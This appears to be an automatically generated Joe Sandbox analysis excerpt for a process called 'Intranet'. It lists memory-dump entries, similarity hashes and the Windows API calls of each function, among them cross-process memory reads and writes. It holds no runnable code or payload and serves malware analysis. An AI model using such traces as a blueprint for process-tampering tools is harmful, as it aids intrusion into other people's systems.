                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: eda029b2067d6ba5fec17af8d7480833467f820e6c5508094b556a4af3c3dd21
                                                                            • Instruction ID: 80d45834477d008d5bb76639e7684ff36f8ca099dd77f6cb993b0ac33ba08003
                                                                            • Opcode Fuzzy Hash: eda029b2067d6ba5fec17af8d7480833467f820e6c5508094b556a4af3c3dd21
                                                                            • Instruction Fuzzy Hash: B6F0AF30200308AFEB100FA59CCCE773BACEF59754B50442AFA44C6290CA60DC04EB60
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004F8D3F
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D49
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D58
                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D5F
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D75
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 12c7a5028b511ab3427c9dab687d01d18202b631017eed2c56d2131e8baca77e
                                                                            • Instruction ID: 3dd5feb795088a845bb83846bfbe770bda45cdde4405091c9267fed3a19fd039
                                                                            • Opcode Fuzzy Hash: 12c7a5028b511ab3427c9dab687d01d18202b631017eed2c56d2131e8baca77e
                                                                            • Instruction Fuzzy Hash: 72F04F31240308AFEB110FA5EC98F7B3BADEF59754F54011AFA45C6290CB65DD45EB60
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004FCD90
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 004FCDA7
                                                                            • MessageBeep.USER32(00000000), ref: 004FCDBF
                                                                            • KillTimer.USER32(?,0000040A), ref: 004FCDDB
                                                                            • EndDialog.USER32(?,00000001,?), ref: 004FCDF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: 363a1a81386042467d4f0457c64787b84c12a905753faca52f711330ba83d016
                                                                            • Instruction ID: e0810a68ae149ca0aaef4b601701f4fef8bd7eec15cbe940d5f2c58bd513713a
                                                                            • Opcode Fuzzy Hash: 363a1a81386042467d4f0457c64787b84c12a905753faca52f711330ba83d016
                                                                            • Instruction Fuzzy Hash: 7601DB3050070CABEF215B10DD9EBAB7B78FB10705F00066AF682611E1DBF4A958DB84
                                                                            APIs
                                                                            • EndPath.GDI32(?,?,004DBBC9,00000000,?), ref: 004A179B
                                                                            • StrokeAndFillPath.GDI32(?,?,004DBBC9,00000000,?), ref: 004A17B7
                                                                            • SelectObject.GDI32(?,?,?,004DBBC9,00000000,?), ref: 004A17CA
                                                                            • DeleteObject.GDI32(?,004DBBC9,00000000,?), ref: 004A17DD
                                                                            • StrokePath.GDI32(?,?,004DBBC9,00000000,?), ref: 004A17F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: df32a968850e232f8b9f80fa3a019138cd42db8c9155f78c11baefc35ff110c1
                                                                            • Instruction ID: 29ca262cd295278b78e4ac122850d787d1271f7072ca2589ed54424171e44cda
                                                                            • Opcode Fuzzy Hash: df32a968850e232f8b9f80fa3a019138cd42db8c9155f78c11baefc35ff110c1
                                                                            • Instruction Fuzzy Hash: 09F03C3000830CEBDB159F29ED4CB593FA4A73632AF049215F42A5B2F0C7744999EF18
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000,00000001,00000000,00530980), ref: 0050CA75
                                                                            • CoCreateInstance.OLE32(00533D3C,00000000,00000001,00533BAC,?), ref: 0050CA8D
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • CoUninitialize.OLE32 ref: 0050CCFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                            • String ID: .lnk
                                                                            • API String ID: 2683427295-24824748
                                                                            • Opcode ID: d4e7f7e6b5c7540c6728ceac475f31bdce3250bbc4fd4daa0c166307b68b11e1
                                                                            • Instruction ID: ecae706752680713a292dd0daa588ee238c38bd899eac737fd5143b8d589ac36
                                                                            • Opcode Fuzzy Hash: d4e7f7e6b5c7540c6728ceac475f31bdce3250bbc4fd4daa0c166307b68b11e1
                                                                            • Instruction Fuzzy Hash: 2AA13A71104205AFD300EF64C891EAFB7E8EFD5708F40491DF555972A2EBB4AA09CB66
                                                                            APIs
                                                                              • Part of subcall function 004C0FE6: std::exception::exception.LIBCMT ref: 004C101C
                                                                              • Part of subcall function 004C0FE6: __CxxThrowException@8.LIBCMT ref: 004C1031
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004B1680: _memmove.LIBCMT ref: 004B16DB
                                                                            • __swprintf.LIBCMT ref: 004AE598
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004AE431
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 1943609520-557222456
                                                                            • Opcode ID: ac02686b8cb7dd1cc1a83b61d730bb2711517397bd3fc1117bdc9a490b96046e
                                                                            • Instruction ID: 42e4f724ec1c01f5c1380f915aa69c86c0f950d693f88f84ca64be4783e1677e
                                                                            • Opcode Fuzzy Hash: ac02686b8cb7dd1cc1a83b61d730bb2711517397bd3fc1117bdc9a490b96046e
                                                                            • Instruction Fuzzy Hash: B491C471504241AFC714EF26D895CAFB7A4EF96308F40091FF496972A1EB28ED44CB6A
                                                                            APIs
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                            • CoInitialize.OLE32(00000000), ref: 0050BFFE
                                                                            • CoCreateInstance.OLE32(00533D3C,00000000,00000001,00533BAC,?), ref: 0050C017
                                                                            • CoUninitialize.OLE32 ref: 0050C034
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                            • String ID: .lnk
                                                                            • API String ID: 2126378814-24824748
                                                                            • Opcode ID: 919599ba993f8f4c52d46ecc9b0b37c0a27d55af415d4009312d922c23905007
                                                                            • Instruction ID: 00ec39f725ce854c27cdf72c79fbcf89832df4a4da63c0105fdabb671f472038
                                                                            • Opcode Fuzzy Hash: 919599ba993f8f4c52d46ecc9b0b37c0a27d55af415d4009312d922c23905007
                                                                            • Instruction Fuzzy Hash: 50A132752042059FC710DF25C894E5EBBE5BF8A318F148A8DF8999B3A2CB35EC45CB91
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 004C52CD
                                                                              • Part of subcall function 004D0320: __87except.LIBCMT ref: 004D035B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__87except__start
                                                                            • String ID: pow
                                                                            • API String ID: 2905807303-2276729525
                                                                            • Opcode ID: 4ae32d8bde79e42a6e35542f4e3d899b224c803e921f4de32ac0554d2f2f9bac
                                                                            • Instruction ID: 35132c91c3b0f356982aae895224d7f5e566f1df50b57bb74fdf1ed56726ebee
                                                                            • Opcode Fuzzy Hash: 4ae32d8bde79e42a6e35542f4e3d899b224c803e921f4de32ac0554d2f2f9bac
                                                                            • Instruction Fuzzy Hash: 66518925A0960586CB55A718C921B7F2BD09B40750F20499FF8C1873E6EE7C9CD9AA4F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$+
                                                                            • API String ID: 0-2552117581
                                                                            • Opcode ID: 974696d61fd768ba7d803a5daf530ae323e939b059f47287f9753824aa76105f
                                                                            • Instruction ID: 715a4d6af67d450f647abc2261e7cacbbd0094fc9d6ef8f093d24e14914986c3
                                                                            • Opcode Fuzzy Hash: 974696d61fd768ba7d803a5daf530ae323e939b059f47287f9753824aa76105f
                                                                            • Instruction Fuzzy Hash: 00513179402249DFCB15EF68C880AFB7BA4EF16314F14405FE9819B3A0D738AC42CB69
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_free
                                                                            • String ID: #VK
                                                                            • API String ID: 2620147621-3366273889
                                                                            • Opcode ID: 9c66d44fc73d52e9bc4d322ed95f71eeb80f39c2554b6589433727623911b038
                                                                            • Instruction ID: 66f880178cc98bdd19febf717381f608a3a05683cb1217b64fc5f09648d02dbf
                                                                            • Opcode Fuzzy Hash: 9c66d44fc73d52e9bc4d322ed95f71eeb80f39c2554b6589433727623911b038
                                                                            • Instruction Fuzzy Hash: C95149B16043418FDB24CF2AC490B6FBBE5BF96318F04492EE59A87351E739E841CB56
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_memmove
                                                                            • String ID: ERCP
                                                                            • API String ID: 2532777613-1384759551
                                                                            • Opcode ID: aa385f946ab31541ef46beb172cdbcebd9fa015d7b56cbf19dce477d84fa4f7a
                                                                            • Instruction ID: b09c62d02763f6db7db4286d5a2c031011e2235a6c1853108ef14ff0c69a1317
                                                                            • Opcode Fuzzy Hash: aa385f946ab31541ef46beb172cdbcebd9fa015d7b56cbf19dce477d84fa4f7a
                                                                            • Instruction Fuzzy Hash: AC51B171900309DBDB24DF65C880BEABBE4EF04318F1485AFE94ADB250E7389585CB59
                                                                            APIs
                                                                              • Part of subcall function 00501CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004F9E4E,?,?,00000034,00000800,?,00000034), ref: 00501CE5
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000,?,00000000,00000010,00000010,?,00000000), ref: 004FA3F7
                                                                              • Part of subcall function 00501C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004F9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00501CB0
                                                                              • Part of subcall function 00501BDD: GetWindowThreadProcessId.USER32(?,?,00000000,00000000,?,?,004F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00501C08
                                                                              • Part of subcall function 00501BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00501C18
                                                                              • Part of subcall function 00501BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00501C2E
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000010,?,00000000,?,00000010,?,00001104,00000000,00000000), ref: 004FA464
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000000,?,00000010,?,00000000,?,00000010,?,00001104), ref: 004FA4B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: 5e43b31d9b9a8085e4488b9da0dabd78e12056b8a6a43a2cf3f27e89200c969d
                                                                            • Instruction ID: 674c78d540681df009078d18ef2a3f373e0ae7de0f2cee13b4710bfd6b1037ab
                                                                            • Opcode Fuzzy Hash: 5e43b31d9b9a8085e4488b9da0dabd78e12056b8a6a43a2cf3f27e89200c969d
                                                                            • Instruction Fuzzy Hash: A2413E7290021DBFDB10DBA4CD85AEEBBB8FF45300F004095FA55B7280DA746E55CB65
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00530980,00000000,?,?,?,?), ref: 00528004
                                                                            • GetWindowLongW.USER32 ref: 00528021
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00528031
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: 0303f2f7d096eda36fd5e2a918aba7d5d99e9c14587402cfad2c3d983710e8a1
                                                                            • Instruction ID: 5effbe6cfa276af3cf94aca93cd3c1bd4bd6e08bd54a1baa869b7f9cb04c3e61
                                                                            • Opcode Fuzzy Hash: 0303f2f7d096eda36fd5e2a918aba7d5d99e9c14587402cfad2c3d983710e8a1
                                                                            • Instruction Fuzzy Hash: F031F031205219AFDB118E38DC45BEA7BA9FF5A324F204325F875932D0DB30E8549B50
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?,?,?,SysMonthCal32,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00527A86
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00527A9A
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00527ABE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: 4260bf4d5dd46563071b9256b9ae1bedf50ccff6c8f20b8e46c1e464fd686bde
                                                                            • Instruction ID: a1a62a2e0d0ee584330e4704459a62178d5639ec5e9db5c6155c82057d8c61c4
                                                                            • Opcode Fuzzy Hash: 4260bf4d5dd46563071b9256b9ae1bedf50ccff6c8f20b8e46c1e464fd686bde
                                                                            • Instruction Fuzzy Hash: 42219C32600229ABDF11CE54DC46FEE3B69FF8D724F110214FE156B1D0DBB1A9549BA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0052826F
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0052827D
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00528284
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: c2ece574f50900a09b525951452f73a1ee0a6d990f216d253aa0c077788abce0
                                                                            • Instruction ID: cf73d1efa894a05b67c8cc881ed154d7d6f6cad190713fe7bd01faddb1b39d57
                                                                            • Opcode Fuzzy Hash: c2ece574f50900a09b525951452f73a1ee0a6d990f216d253aa0c077788abce0
                                                                            • Instruction Fuzzy Hash: B1216BB5604219AFDB10DF98DC95D763BADFF5A358B080059FA019B2A1CB70EC11DAA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?,?,?,Listbox,00000000,00000000,?,?,?,?,?,?,00000001), ref: 00527360
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00527370
